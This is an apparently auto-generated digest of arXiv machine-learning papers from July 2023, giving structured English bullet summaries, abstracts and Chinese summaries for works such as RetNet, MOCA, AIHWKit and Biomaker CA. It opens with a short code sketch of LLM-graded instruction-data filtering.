\url{https://lichang-chen.github.io/AlpaGasus/}.
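The data-selection step can be pictured as the small filter below: a strong LLM grades every instruction/response pair and only high-scoring pairs are kept for IFT. The grading prompt, the 0-5 scale, the threshold of 4.5, and the `llm_score` callable are illustrative assumptions standing in for whatever API call returns the rating.

```python
GRADING_PROMPT = (
    "Rate the quality of the response to the instruction on a scale of 0 to 5.\n"
    "Instruction: {instruction}\nResponse: {response}\nScore:"
)

def filter_ift_data(examples, llm_score, threshold=4.5):
    """Keep only (instruction, response) pairs the grader LLM rates highly."""
    kept = []
    for ex in examples:
        if llm_score(GRADING_PROMPT.format(**ex)) >= threshold:
            kept.append(ex)
    return kept

# Example with a dummy scorer in place of a real LLM call:
data = [{"instruction": "Name three primary colors.",
         "response": "Red, blue, and yellow."}]
print(filter_ift_data(data, llm_score=lambda prompt: 5.0))
```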

Multilingual Speech-to-Speech Translation into Multiple Target Languages

  • paper_url: http://arxiv.org/abs/2307.08655
  • repo_url: None
  • paper_authors: Hongyu Gong, Ning Dong, Sravya Popuri, Vedanuj Goswami, Ann Lee, Juan Pino
  • for: The paper studies multilingual speech-to-speech translation (S2ST) that supports multiple target languages, enabling spoken communication across languages.
  • methods: Building on the key components of direct S2ST, speech-to-unit (S2U) and the vocoder, the model extends S2U to speech-to-masked-unit (S2MU), which masks units that do not belong to the given target language to reduce language interference, and trains a multilingual vocoder with language embeddings and an auxiliary language-identification loss.
  • results: On benchmark translation test sets, the proposed multilingual model outperforms bilingual models in translation from English into 16 target languages.
    Abstract Speech-to-speech translation (S2ST) enables spoken communication between people talking in different languages. Despite a few studies on multilingual S2ST, their focus is the multilinguality on the source side, i.e., the translation from multiple source languages to one target language. We present the first work on multilingual S2ST supporting multiple target languages. Leveraging recent advance in direct S2ST with speech-to-unit and vocoder, we equip these key components with multilingual capability. Speech-to-masked-unit (S2MU) is the multilingual extension of S2U, which applies masking to units which don't belong to the given target language to reduce the language interference. We also propose multilingual vocoder which is trained with language embedding and the auxiliary loss of language identification. On benchmark translation testsets, our proposed multilingual model shows superior performance than bilingual models in the translation from English into $16$ target languages.

Retentive Network: A Successor to Transformer for Large Language Models

  • paper_url: http://arxiv.org/abs/2307.08621
  • repo_url: https://github.com/microsoft/unilm
  • paper_authors: Yutao Sun, Li Dong, Shaohan Huang, Shuming Ma, Yuqing Xia, Jilong Xue, Jianyong Wang, Furu Wei
  • for: The paper proposes Retentive Network (RetNet) as a foundation architecture for large language models, simultaneously achieving training parallelism, low-cost inference, and good performance.
  • methods: The paper theoretically derives the connection between recurrence and attention and proposes the retention mechanism for sequence modeling, which supports three computation paradigms: parallel, recurrent, and chunkwise recurrent.
  • results: Experimental results on language modeling show that RetNet achieves favorable scaling results, parallel training, low-cost deployment, and efficient inference.
    Abstract In this work, we propose Retentive Network (RetNet) as a foundation architecture for large language models, simultaneously achieving training parallelism, low-cost inference, and good performance. We theoretically derive the connection between recurrence and attention. Then we propose the retention mechanism for sequence modeling, which supports three computation paradigms, i.e., parallel, recurrent, and chunkwise recurrent. Specifically, the parallel representation allows for training parallelism. The recurrent representation enables low-cost $O(1)$ inference, which improves decoding throughput, latency, and GPU memory without sacrificing performance. The chunkwise recurrent representation facilitates efficient long-sequence modeling with linear complexity, where each chunk is encoded parallelly while recurrently summarizing the chunks. Experimental results on language modeling show that RetNet achieves favorable scaling results, parallel training, low-cost deployment, and efficient inference. The intriguing properties make RetNet a strong successor to Transformer for large language models. Code will be available at https://aka.ms/retnet.
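The recurrent computation paradigm can be sketched for a single retention head as below, following the recurrent form S_n = γ·S_{n-1} + k_nᵀ v_n and o_n = q_n S_n; the projections, multi-head structure, group normalization, and gating of the full RetNet block are omitted, and the decay value is arbitrary.

```python
import torch

def recurrent_retention(q, k, v, gamma: float):
    """q, k: (seq_len, d_k); v: (seq_len, d_v). O(1) state update per step."""
    seq_len, d_k = q.shape
    d_v = v.shape[1]
    state = torch.zeros(d_k, d_v)
    outputs = []
    for n in range(seq_len):
        state = gamma * state + torch.outer(k[n], v[n])   # decayed outer-product state
        outputs.append(q[n] @ state)                      # read out with the query
    return torch.stack(outputs)                           # (seq_len, d_v)

out = recurrent_retention(torch.randn(8, 16), torch.randn(8, 16),
                          torch.randn(8, 32), gamma=0.9)
```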

Multimodal Diffusion Segmentation Model for Object Segmentation from Manipulation Instructions

  • paper_url: http://arxiv.org/abs/2307.08597
  • repo_url: None
  • paper_authors: Yui Iioka, Yu Yoshida, Yuiga Wada, Shumpei Hatanaka, Komei Sugiura
  • for: The study aims to develop a model that comprehends a natural language instruction (e.g., "Go to the living room and get the nearest pillow to the radio art on the wall") and generates a segmentation mask for the target everyday object. The task is challenging because it requires (1) understanding the referring expressions for multiple objects in the instruction, (2) predicting the target phrase of the sentence among multiple phrases, and (3) generating pixel-wise segmentation masks rather than bounding boxes; prior language-based segmentation methods sometimes mask irrelevant regions for complex sentences.
  • methods: The proposed Multimodal Diffusion Segmentation Model (MDSM) generates a segmentation mask in a first stage and refines it in a second stage, introducing a crossmodal parallel feature extraction mechanism and extending diffusion probabilistic models to handle crossmodal features.
  • results: On a new dataset built from the Matterport3D and REVERIE datasets, MDSM surpasses the baseline method by a large margin of +10.13 mean IoU.
    Abstract In this study, we aim to develop a model that comprehends a natural language instruction (e.g., "Go to the living room and get the nearest pillow to the radio art on the wall") and generates a segmentation mask for the target everyday object. The task is challenging because it requires (1) the understanding of the referring expressions for multiple objects in the instruction, (2) the prediction of the target phrase of the sentence among the multiple phrases, and (3) the generation of pixel-wise segmentation masks rather than bounding boxes. Studies have been conducted on languagebased segmentation methods; however, they sometimes mask irrelevant regions for complex sentences. In this paper, we propose the Multimodal Diffusion Segmentation Model (MDSM), which generates a mask in the first stage and refines it in the second stage. We introduce a crossmodal parallel feature extraction mechanism and extend diffusion probabilistic models to handle crossmodal features. To validate our model, we built a new dataset based on the well-known Matterport3D and REVERIE datasets. This dataset consists of instructions with complex referring expressions accompanied by real indoor environmental images that feature various target objects, in addition to pixel-wise segmentation masks. The performance of MDSM surpassed that of the baseline method by a large margin of +10.13 mean IoU.

cs.LG - 2023-07-18

Enhancing Pattern Classification in Support Vector Machines through Matrix Formulation

  • paper_url: http://arxiv.org/abs/2307.09372
  • repo_url: None
  • paper_authors: Sambhav Jain Reshma Rastogi
  • for: The paper proposes a matrix formulation of Support Vector Machines (Matrix SVM) to address the limitations of existing vector-based SVM models in multiclass and multilabel settings.
  • methods: The Matrix-SVM problem is solved efficiently by applying the Accelerated Gradient Descent method in the dual.
  • results: Experiments on multilabel and multiclass datasets show that Matrix SVM achieves superior time efficiency while delivering results similar to Binary Relevance SVM; the matrix formulation also reveals insights and advantages that are not readily apparent in traditional vector-based notation.
    Abstract Support Vector Machines (SVM) have gathered significant acclaim as classifiers due to their successful implementation of Statistical Learning Theory. However, in the context of multiclass and multilabel settings, the reliance on vector-based formulations in existing SVM-based models poses limitations regarding flexibility and ease of incorporating additional terms to handle specific challenges. To overcome these limitations, our research paper focuses on introducing a matrix formulation for SVM that effectively addresses these constraints. By employing the Accelerated Gradient Descent method in the dual, we notably enhance the efficiency of solving the Matrix-SVM problem. Experimental evaluations on multilabel and multiclass datasets demonstrate that Matrix SVM achieves superior time efficacy while delivering similar results to Binary Relevance SVM. Moreover, our matrix formulation unveils crucial insights and advantages that may not be readily apparent in traditional vector-based notations. We emphasize that numerous multilabel models can be viewed as extensions of SVM, with customised modifications to meet specific requirements. The matrix formulation presented in this paper establishes a solid foundation for developing more sophisticated models capable of effectively addressing the distinctive challenges encountered in multilabel learning.

Explanation-Guided Fair Federated Learning for Transparent 6G RAN Slicing

  • paper_url: http://arxiv.org/abs/2307.09494
  • repo_url: None
  • paper_authors: Swastika Roy, Hatim Chergui, Christos Verikoukis
  • for: The paper targets transparency and trustworthiness in zero-touch 6G network automation by using explainable AI (XAI) to build trust in the AI black boxes.
  • methods: It combines closed-loop automation with explanation-guided learning (EGL), designing an explanation-guided federated learning (EGFL) scheme that exploits model explanations during training via the Jensen-Shannon (JS) divergence, with fairness formulated in terms of the recall metric and included as a constraint in the optimization task.
  • results: Simulations on per-slice RAN dropped-traffic probability prediction show that the proposed EGFL-JS scheme improves the comprehensiveness of explanations by more than 50% compared to baselines from the literature, including the Kullback-Leibler-based variant EGFL-KL, and improves the recall score by more than 25% relative to unconstrained EGFL.
    Abstract Future zero-touch artificial intelligence (AI)-driven 6G network automation requires building trust in the AI black boxes via explainable artificial intelligence (XAI), where it is expected that AI faithfulness would be a quantifiable service-level agreement (SLA) metric along with telecommunications key performance indicators (KPIs). This entails exploiting the XAI outputs to generate transparent and unbiased deep neural networks (DNNs). Motivated by closed-loop (CL) automation and explanation-guided learning (EGL), we design an explanation-guided federated learning (EGFL) scheme to ensure trustworthy predictions by exploiting the model explanation emanating from XAI strategies during the training run time via Jensen-Shannon (JS) divergence. Specifically, we predict per-slice RAN dropped traffic probability to exemplify the proposed concept while respecting fairness goals formulated in terms of the recall metric which is included as a constraint in the optimization task. Finally, the comprehensiveness score is adopted to measure and validate the faithfulness of the explanations quantitatively. Simulation results show that the proposed EGFL-JS scheme has achieved more than $50\%$ increase in terms of comprehensiveness compared to different baselines from the literature, especially the variant EGFL-KL that is based on the Kullback-Leibler Divergence. It has also improved the recall score with more than $25\%$ relatively to unconstrained-EGFL.
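Since the scheme is built around the Jensen-Shannon divergence between explanations, a small helper like the one below conveys the quantity involved; how the divergence enters the federated training loss is not spelled out in the abstract and is not shown here.

```python
import numpy as np

def js_divergence(p, q, eps=1e-12):
    """Jensen-Shannon divergence between two attribution/probability vectors."""
    p = np.asarray(p, dtype=float); p = p / p.sum()
    q = np.asarray(q, dtype=float); q = q / q.sum()
    m = 0.5 * (p + q)
    def kl(a, b):
        return np.sum(a * np.log((a + eps) / (b + eps)))
    return 0.5 * kl(p, m) + 0.5 * kl(q, m)

print(js_divergence([0.7, 0.2, 0.1], [0.5, 0.3, 0.2]))
```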

Sparse Gaussian Graphical Models with Discrete Optimization: Computational and Statistical Perspectives

  • paper_url: http://arxiv.org/abs/2307.09366
  • repo_url: None
  • paper_authors: Kayhan Behdin, Wenyu Chen, Rahul Mazumder
  • for: The paper aims to estimate the inverse covariance matrix of a multivariate Gaussian distribution, assuming it is sparse.
  • methods: The proposed method, called GraphL0BnB, is based on an $\ell_0$-penalized version of the pseudolikelihood function and uses a custom nonlinear branch-and-bound framework to solve the resulting mixed integer program.
  • results: Numerical experiments on real and synthetic datasets demonstrate that GraphL0BnB solves the problem to near-optimality, even for large problem instances with $p = 10^4$ variables, and compares favorably with various state-of-the-art approaches.
    Abstract We consider the problem of learning a sparse graph underlying an undirected Gaussian graphical model, a key problem in statistical machine learning. Given $n$ samples from a multivariate Gaussian distribution with $p$ variables, the goal is to estimate the $p \times p$ inverse covariance matrix (aka precision matrix), assuming it is sparse (i.e., has a few nonzero entries). We propose GraphL0BnB, a new estimator based on an $\ell_0$-penalized version of the pseudolikelihood function, while most earlier approaches are based on the $\ell_1$-relaxation. Our estimator can be formulated as a convex mixed integer program (MIP) which can be difficult to compute at scale using off-the-shelf commercial solvers. To solve the MIP, we propose a custom nonlinear branch-and-bound (BnB) framework that solves node relaxations with tailored first-order methods. As a by-product of our BnB framework, we propose large-scale solvers for obtaining good primal solutions that are of independent interest. We derive novel statistical guarantees (estimation and variable selection) for our estimator and discuss how our approach improves upon existing estimators. Our numerical experiments on real/synthetic datasets suggest that our method can solve, to near-optimality, problem instances with $p = 10^4$ -- corresponding to a symmetric matrix of size $p \times p$ with $p^2/2$ binary variables. We demonstrate the usefulness of GraphL0BnB versus various state-of-the-art approaches on a range of datasets.

An Evaluation of Zero-Cost Proxies – from Neural Architecture Performance to Model Robustness

  • paper_url: http://arxiv.org/abs/2307.09365
  • repo_url: None
  • paper_authors: Jovita Lukasik, Michael Moeller, Margret Keuper
  • for: The paper studies zero-cost proxies in neural architecture search, particularly for the joint search over robustness and clean accuracy in the NAS-Bench-201 search space.
  • methods: Common zero-cost proxies are analyzed as performance predictors for robustness and for the joint multi-objective of clean and robust accuracy, together with an analysis of the feature importance of the proxies.
  • results: Predicting robustness from a single proxy is considerably more challenging than predicting clean accuracy, so several proxies must be considered jointly to predict a model's robustness, whereas clean accuracy can be regressed from a single such feature.
    Abstract Zero-cost proxies are nowadays frequently studied and used to search for neural architectures. They show an impressive ability to predict the performance of architectures by making use of their untrained weights. These techniques allow for immense search speed-ups. So far the joint search for well-performing and robust architectures has received much less attention in the field of NAS. Therefore, the main focus of zero-cost proxies is the clean accuracy of architectures, whereas the model robustness should play an evenly important part. In this paper, we analyze the ability of common zero-cost proxies to serve as performance predictors for robustness in the popular NAS-Bench-201 search space. We are interested in the single prediction task for robustness and the joint multi-objective of clean and robust accuracy. We further analyze the feature importance of the proxies and show that predicting the robustness makes the prediction task from existing zero-cost proxies more challenging. As a result, the joint consideration of several proxies becomes necessary to predict a model's robustness while the clean accuracy can be regressed from a single such feature.

MOCA: Self-supervised Representation Learning by Predicting Masked Online Codebook Assignments

  • paper_url: http://arxiv.org/abs/2307.09361
  • repo_url: None
  • paper_authors: Spyros Gidaris, Andrei Bursuc, Oriane Simeoni, Antonin Vobecky, Nikos Komodakis, Matthieu Cord, Patrick Pérez
  • for: 降低视Transformer网络的贪吃需求,使用自监学习来减少大量完全标注数据的需求。
  • methods: 提出了一种单Stage和独立的方法MOCA,通过使用高级特征定义的面积预测任务来捕捉具有良好上下文理解性和图像变化不变性的两种自监学习方法。
  • results: 在低投入设定下实现新的状态纪录Results,并在多种评估协议中显示出了强大的实验性能,训练时间至少3倍 быстреeder than先前的方法。
    Abstract Self-supervised learning can be used for mitigating the greedy needs of Vision Transformer networks for very large fully-annotated datasets. Different classes of self-supervised learning offer representations with either good contextual reasoning properties, e.g., using masked image modeling strategies, or invariance to image perturbations, e.g., with contrastive methods. In this work, we propose a single-stage and standalone method, MOCA, which unifies both desired properties using novel mask-and-predict objectives defined with high-level features (instead of pixel-level details). Moreover, we show how to effectively employ both learning paradigms in a synergistic and computation-efficient way. Doing so, we achieve new state-of-the-art results on low-shot settings and strong experimental results in various evaluation protocols with a training that is at least 3 times faster than prior methods.
    摘要 自监督学习可以缓解视觉 Transformer 网络对超大规模全标注数据集的依赖。不同类别的自监督学习方法提供不同特性的表示:例如,遮挡图像建模策略可以获得良好的上下文推理能力,而对比学习方法可以获得对图像扰动的不变性。在这项工作中,我们提出了一种单阶段、独立的方法 MOCA,它通过基于高层特征(而非像素级细节)定义的新型"遮挡并预测"目标,将这两种期望的特性统一起来。此外,我们展示了如何以协同且计算高效的方式同时利用这两种学习范式。借此,我们在低样本设定下取得了新的最优结果,并在多种评估协议中获得了强劲的实验结果,且训练速度比先前方法至少快 3 倍。

Using the IBM Analog In-Memory Hardware Acceleration Kit for Neural Network Training and Inference

  • paper_url: http://arxiv.org/abs/2307.09357
  • repo_url: https://github.com/IBM/aihwkit
  • paper_authors: Manuel Le Gallo, Corey Lammie, Julian Buechel, Fabio Carta, Omobayode Fagbohungbe, Charles Mackin, Hsinyu Tsai, Vijay Narayanan, Abu Sebastian, Kaoutar El Maghraoui, Malte J. Rasch
  • for: 本文旨在介绍如何在Analog In-Memory Computing(AIMC)硬件上部署深度神经网络(DNN)推理和训练,以实现与数字计算相同的准确性。
  • methods: 本文使用IBM的Analog Hardware Acceleration Kit(AIHWKit)Python库来模拟DNN的推理和训练。AIHWKit提供了各种功能和最佳实践来进行推理和训练。
  • results: 本文提供了AIHWKit在推理和训练DNN时的性能分析和评估。此外,本文还介绍了Analog AI Cloud Composer,它提供了使用AIHWKit simulation platform的完全托管云环境的优势。
    Abstract Analog In-Memory Computing (AIMC) is a promising approach to reduce the latency and energy consumption of Deep Neural Network (DNN) inference and training. However, the noisy and non-linear device characteristics, and the non-ideal peripheral circuitry in AIMC chips, require adapting DNNs to be deployed on such hardware to achieve equivalent accuracy to digital computing. In this tutorial, we provide a deep dive into how such adaptations can be achieved and evaluated using the recently released IBM Analog Hardware Acceleration Kit (AIHWKit), freely available at https://github.com/IBM/aihwkit. The AIHWKit is a Python library that simulates inference and training of DNNs using AIMC. We present an in-depth description of the AIHWKit design, functionality, and best practices to properly perform inference and training. We also present an overview of the Analog AI Cloud Composer, that provides the benefits of using the AIHWKit simulation platform in a fully managed cloud setting. Finally, we show examples on how users can expand and customize AIHWKit for their own needs. This tutorial is accompanied by comprehensive Jupyter Notebook code examples that can be run using AIHWKit, which can be downloaded from https://github.com/IBM/aihwkit/tree/master/notebooks/tutorial.
    摘要 模拟内存计算(AIMC)是一种有前途的方法,可以降低深度神经网络(DNN)推理和训练的延迟与能耗。然而,AIMC 芯片上的器件特性带有噪声且非线性,外围电路也并非理想,因此需要对 DNN 进行适配,才能在这类硬件上达到与数字计算相当的准确率。在这个教程中,我们深入讲解如何利用 IBM 最近发布、可从 https://github.com/IBM/aihwkit 免费获取的模拟硬件加速工具包(AIHWKit)来实现并评估这类适配。AIHWKit 是一个 Python 库,可以模拟基于 AIMC 的 DNN 推理和训练。我们详细介绍 AIHWKit 的设计、功能以及正确进行推理和训练的最佳实践,并概述 Analog AI Cloud Composer,它在全托管的云环境中提供使用 AIHWKit 仿真平台的便利。最后,我们展示用户如何针对自身需求扩展和自定义 AIHWKit。该教程配有完整的 Jupyter Notebook 代码示例,可在 https://github.com/IBM/aihwkit/tree/master/notebooks/tutorial 下载并使用 AIHWKit 运行。
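As a minimal, hedged illustration of the library's analog layers (the authoritative examples are the tutorial notebooks linked above; exact arguments and required calls can vary between AIHWKit versions):

```python
# Minimal AIHWKit sketch: a tiny analog network trained with AnalogSGD.
# Based on the library's documented basic usage; some versions additionally require
# optimizer.regroup_param_groups(model) after constructing the optimizer.
import torch
from torch import nn
from aihwkit.nn import AnalogLinear
from aihwkit.optim import AnalogSGD
from aihwkit.simulator.configs import SingleRPUConfig

model = nn.Sequential(
    AnalogLinear(4, 8, rpu_config=SingleRPUConfig()),
    nn.ReLU(),
    AnalogLinear(8, 2, rpu_config=SingleRPUConfig()),
)
optimizer = AnalogSGD(model.parameters(), lr=0.1)
loss_fn = nn.CrossEntropyLoss()

x, y = torch.randn(16, 4), torch.randint(0, 2, (16,))
for _ in range(5):
    optimizer.zero_grad()
    loss = loss_fn(model(x), y)
    loss.backward()
    optimizer.step()
print("final loss:", float(loss))
```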

Learning to Select SAT Encodings for Pseudo-Boolean and Linear Integer Constraints

  • paper_url: http://arxiv.org/abs/2307.09342
  • repo_url: https://github.com/felixvuo/lease-data
  • paper_authors: Felix Ulrich-Oltean, Peter Nightingale, James Alfred Walker
  • for: 解决复杂的满足和优化问题
  • methods: 使用超级vised机器学习方法选择编码
  • results: 比AutoFolio好,可以选择不同类型的问题编码
    Abstract Many constraint satisfaction and optimisation problems can be solved effectively by encoding them as instances of the Boolean Satisfiability problem (SAT). However, even the simplest types of constraints have many encodings in the literature with widely varying performance, and the problem of selecting suitable encodings for a given problem instance is not trivial. We explore the problem of selecting encodings for pseudo-Boolean and linear constraints using a supervised machine learning approach. We show that it is possible to select encodings effectively using a standard set of features for constraint problems; however we obtain better performance with a new set of features specifically designed for the pseudo-Boolean and linear constraints. In fact, we achieve good results when selecting encodings for unseen problem classes. Our results compare favourably to AutoFolio when using the same feature set. We discuss the relative importance of instance features to the task of selecting the best encodings, and compare several variations of the machine learning method.
    摘要 许多约束满足和优化问题可以通过编码为布尔可满足性问题(SAT)来有效求解。然而,即便是最简单的约束类型,文献中也存在许多性能差异很大的编码方式,为给定问题实例选择合适的编码并非易事。我们使用监督式机器学习方法来研究伪布尔约束和线性约束的编码选择问题。结果表明,使用标准的约束问题特征集即可有效地选择编码;而使用专门为伪布尔和线性约束设计的新特征集可以获得更好的性能。事实上,即使在未见过的问题类别上选择编码,我们也取得了良好的结果。在使用相同特征集的情况下,我们的结果优于 AutoFolio。我们还讨论了实例特征对选择最佳编码的相对重要性,并比较了该机器学习方法的若干变体。
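A generic sketch of the supervised selection step follows; the instance features, candidate encodings, and labels are illustrative placeholders, not the feature sets studied in the paper.

```python
# Sketch: learn to pick a pseudo-Boolean/linear-constraint encoding from instance features.
import numpy as np
from sklearn.ensemble import RandomForestClassifier

encodings = ["sequential", "totalizer", "bdd", "adder"]     # illustrative candidate encodings
rng = np.random.default_rng(1)

X = rng.normal(size=(300, 5))                  # hypothetical features: #constraints, arity, ...
y = rng.integers(0, len(encodings), size=300)  # stand-in label: fastest encoding per instance

clf = RandomForestClassifier(n_estimators=300, random_state=0).fit(X, y)
new_instance = rng.normal(size=(1, 5))
print("predicted encoding:", encodings[int(clf.predict(new_instance)[0])])
```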

Towards Automated Semantic Segmentation in Mammography Images

  • paper_url: http://arxiv.org/abs/2307.10296
  • repo_url: None
  • paper_authors: Cesar A. Sierra-Franco, Jan Hurtado, Victor de A. Thomaz, Leonardo C. da Cruz, Santiago V. Silva, Alberto B. Raposo
  • for: 检测非可触护乳腺癌,提供诊断和评估图像质量的机会。
  • methods: 使用深度学习框架自动 segmenting 乳腺、肌肉、肉细胞和脂肪组织的边界。
  • results: 在多种不同的框架和图像 dataset 下,实现了准确的 segmentation 性能,表明该框架可以在临床实践中整合。
    Abstract Mammography images are widely used to detect non-palpable breast lesions or nodules, preventing cancer and providing the opportunity to plan interventions when necessary. The identification of some structures of interest is essential to make a diagnosis and evaluate image adequacy. Thus, computer-aided detection systems can be helpful in assisting medical interpretation by automatically segmenting these landmark structures. In this paper, we propose a deep learning-based framework for the segmentation of the nipple, the pectoral muscle, the fibroglandular tissue, and the fatty tissue on standard-view mammography images. We introduce a large private segmentation dataset and extensive experiments considering different deep-learning model architectures. Our experiments demonstrate accurate segmentation performance on variate and challenging cases, showing that this framework can be integrated into clinical practice.
    摘要 乳腺X线(钼靶)影像广泛用于检测不可触及的乳腺病灶或结节,有助于预防癌症进展,并在必要时为干预提供规划依据。识别若干关键结构对于做出诊断和评估影像质量至关重要,因此计算机辅助检测系统可以通过自动分割这些标志性结构来协助医学判读。在这篇论文中,我们提出了一个基于深度学习的框架,用于在标准视图乳腺影像中自动分割乳头、胸肌、纤维腺体组织和脂肪组织。我们构建了一个大型私有分割数据集,并针对多种深度学习模型架构进行了广泛实验。实验结果表明,该框架在多样且具有挑战性的病例上都能实现准确的分割,说明它可以集成到临床实践中。

Exploiting Field Dependencies for Learning on Categorical Data

  • paper_url: http://arxiv.org/abs/2307.09321
  • repo_url: https://github.com/csiro-robotics/mdl
  • paper_authors: Zhibin Li, Piotr Koniusz, Lu Zhang, Daniel Edward Pagendam, Peyman Moghadam
  • for: 学习 categorical 数据中的依赖关系,以提高模型的准确率和稳定性。
  • methods: 提出了一种新的方法,通过学习全局字段依赖矩阵,然后在实例级别使用不同的权重(即本地依赖模型)来提高字段间的模型。
  • results: 在六个popular数据集上比较了多种现有方法,并达到了更高的准确率和稳定性。详细的ablation study提供了更多的内容。
    Abstract Traditional approaches for learning on categorical data underexploit the dependencies between columns (\aka fields) in a dataset because they rely on the embedding of data points driven alone by the classification/regression loss. In contrast, we propose a novel method for learning on categorical data with the goal of exploiting dependencies between fields. Instead of modelling statistics of features globally (i.e., by the covariance matrix of features), we learn a global field dependency matrix that captures dependencies between fields and then we refine the global field dependency matrix at the instance-wise level with different weights (so-called local dependency modelling) w.r.t. each field to improve the modelling of the field dependencies. Our algorithm exploits the meta-learning paradigm, i.e., the dependency matrices are refined in the inner loop of the meta-learning algorithm without the use of labels, whereas the outer loop intertwines the updates of the embedding matrix (the matrix performing projection) and global dependency matrix in a supervised fashion (with the use of labels). Our method is simple yet it outperforms several state-of-the-art methods on six popular dataset benchmarks. Detailed ablation studies provide additional insights into our method.
    摘要 传统的类别型数据学习方法未能充分利用数据集中各列(即字段)之间的依赖关系,因为数据点的嵌入仅由分类/回归损失驱动。相比之下,我们提出了一种新方法,旨在利用字段之间的依赖关系。我们不是对特征的全局统计量(如特征协方差矩阵)进行建模,而是学习一个捕捉字段间依赖关系的全局字段依赖矩阵,并在实例级别针对每个字段使用不同的权重(即局部依赖建模)对该全局依赖矩阵进行细化,从而改进字段依赖的建模。我们的算法采用元学习范式:依赖矩阵在内循环中无需标签即可细化,而外循环则在有标签的监督方式下交替更新嵌入矩阵(执行投影的矩阵)和全局依赖矩阵。该方法虽然简单,却在六个流行的基准数据集上优于多种最新方法。详细的消融研究进一步揭示了方法的内在机制。
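An illustrative torch sketch of the core idea, a learned global field-dependency matrix refined per instance by local weights, is given below; it is not the authors' exact architecture or meta-learning loop.

```python
# Illustration only: global dependency matrix + instance-wise (local) refinement.
import torch
from torch import nn

class FieldDependencyLayer(nn.Module):
    def __init__(self, num_fields: int, dim: int):
        super().__init__()
        self.global_dep = nn.Parameter(torch.eye(num_fields))          # global field dependencies
        self.local_weight = nn.Linear(num_fields * dim, num_fields * num_fields)
        self.num_fields = num_fields

    def forward(self, field_emb: torch.Tensor) -> torch.Tensor:
        # field_emb: (batch, num_fields, dim)
        b = field_emb.size(0)
        local = self.local_weight(field_emb.reshape(b, -1)).view(b, self.num_fields, self.num_fields)
        dep = torch.softmax(self.global_dep + local, dim=-1)            # instance-wise refined matrix
        return dep @ field_emb                                          # mix field embeddings

layer = FieldDependencyLayer(num_fields=6, dim=16)
print(layer(torch.randn(4, 6, 16)).shape)  # torch.Size([4, 6, 16])
```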

Biomaker CA: a Biome Maker project using Cellular Automata

  • paper_url: http://arxiv.org/abs/2307.09320
  • repo_url: None
  • paper_authors: Ettore Randazzo, Alexander Mordvintsev
  • for: 这个论文是关于使用细胞自动机(CA)模拟生物体的生长和进化的研究。
  • methods: 这个研究使用了Python JAX框架对2D网格上的CA规则进行并行计算,并提供了不同的环境和物理法则,以及不同的模型架构和 мутаagen策略。
  • results: 研究人员通过模拟不同的环境和物理法则,证明了植物代理可以在缺乏营养的环境中生长、存活、繁殖和演化,并且可以通过用户交互式进行进化。
    Abstract We introduce Biomaker CA: a Biome Maker project using Cellular Automata (CA). In Biomaker CA, morphogenesis is a first class citizen and small seeds need to grow into plant-like organisms to survive in a nutrient starved environment and eventually reproduce with variation so that a biome survives for long timelines. We simulate complex biomes by means of CA rules in 2D grids and parallelize all of its computation on GPUs through the Python JAX framework. We show how this project allows for several different kinds of environments and laws of 'physics', alongside different model architectures and mutation strategies. We further analyze some configurations to show how plant agents can grow, survive, reproduce, and evolve, forming stable and unstable biomes. We then demonstrate how one can meta-evolve models to survive in a harsh environment either through end-to-end meta-evolution or by a more surgical and efficient approach, called Petri dish meta-evolution. Finally, we show how to perform interactive evolution, where the user decides how to evolve a plant model interactively and then deploys it in a larger environment. We open source Biomaker CA at: https://tinyurl.com/2x8yu34s .
    摘要 我们介绍 Biomaker CA:一个基于细胞自动机(CA)的生物群落生成(Biome Maker)项目。在 Biomaker CA 中,形态发生是一等公民:小小的种子必须在营养匮乏的环境中生长为类似植物的生物体才能存活,并最终带着变异繁殖后代,使整个生物群落得以长期延续。我们使用 2D 网格上的 CA 规则来模拟复杂的生物群落,并通过 Python JAX 框架在 GPU 上并行计算。我们展示了该项目可以支持多种环境和"物理"法则,以及不同的模型架构和突变策略。我们进一步分析了若干配置,说明植物智能体如何生长、存活、繁殖和演化,形成稳定或不稳定的生物群落。随后我们演示了如何通过元进化使模型在严酷环境中存活:既可以采用端到端元进化,也可以采用更有针对性、更高效的"培养皿(Petri dish)元进化"方法。最后,我们展示了交互式进化:用户以交互方式决定如何演化一个植物模型,再将其部署到更大的环境中。我们开源了 Biomaker CA,请参见:https://tinyurl.com/2x8yu34s 。

Multi-Modal Discussion Transformer: Integrating Text, Images and Graph Transformers to Detect Hate Speech on Social Media

  • paper_url: http://arxiv.org/abs/2307.09312
  • repo_url: https://github.com/liamhebert/multimodaldiscussiontransformer
  • paper_authors: Liam Hebert, Gaurav Sahu, Nanda Kishore Sreenivas, Lukasz Golab, Robin Cohen
  • for: 本研究的目的是开发一种基于多模态图表示的 hate speech 检测模型,以捕捉在在线社交网络中的谩骂语言。
  • methods: 该模型使用图transformer来捕捉整个讨论的上下文关系,并使用杂合层将文本和图像嵌入组合以取代单modal处理。
  • results: 与仅处理文本的基线相比,我们的模型在检测仇恨言论方面的性能明显提高,我们还进行了广泛的消融研究。
    Abstract We present the Multi-Modal Discussion Transformer (mDT), a novel multi-modal graph-based transformer model for detecting hate speech in online social networks. In contrast to traditional text-only methods, our approach to labelling a comment as hate speech centers around the holistic analysis of text and images. This is done by leveraging graph transformers to capture the contextual relationships in the entire discussion that surrounds a comment, with interwoven fusion layers to combine text and image embeddings instead of processing different modalities separately. We compare the performance of our model to baselines that only process text; we also conduct extensive ablation studies. We conclude with future work for multimodal solutions to deliver social value in online contexts, arguing that capturing a holistic view of a conversation greatly advances the effort to detect anti-social behavior.
    摘要 我们提出了多模态讨论 Transformer(mDT),一种新颖的基于图的多模态 Transformer 模型,用于检测在线社交网络中的仇恨言论。与传统的纯文本方法不同,我们在判定一条评论是否为仇恨言论时,以文本与图像的整体分析为核心:利用图 Transformer 捕捉评论所处整个讨论的上下文关系,并通过交织的融合层将文本与图像嵌入结合起来,而不是分别处理不同模态。我们将模型与仅处理文本的基线进行比较,并开展了广泛的消融研究。最后,我们展望了多模态方案如何在在线环境中创造社会价值,并指出对对话的整体把握能极大推进反社会行为的检测。

Automatic Differentiation for Inverse Problems with Applications in Quantum Transport

  • paper_url: http://arxiv.org/abs/2307.09311
  • repo_url: None
  • paper_authors: Ivan Williams, Eric Polizzi
  • for: inverse quantum transport problem
  • methods: neural solver and differentiable simulation
  • results: engineering continuous transmission properties and current-voltage characteristics
    Abstract A neural solver and differentiable simulation of the quantum transmitting boundary model is presented for the inverse quantum transport problem. The neural solver is used to engineer continuous transmission properties and the differentiable simulation is used to engineer current-voltage characteristics.
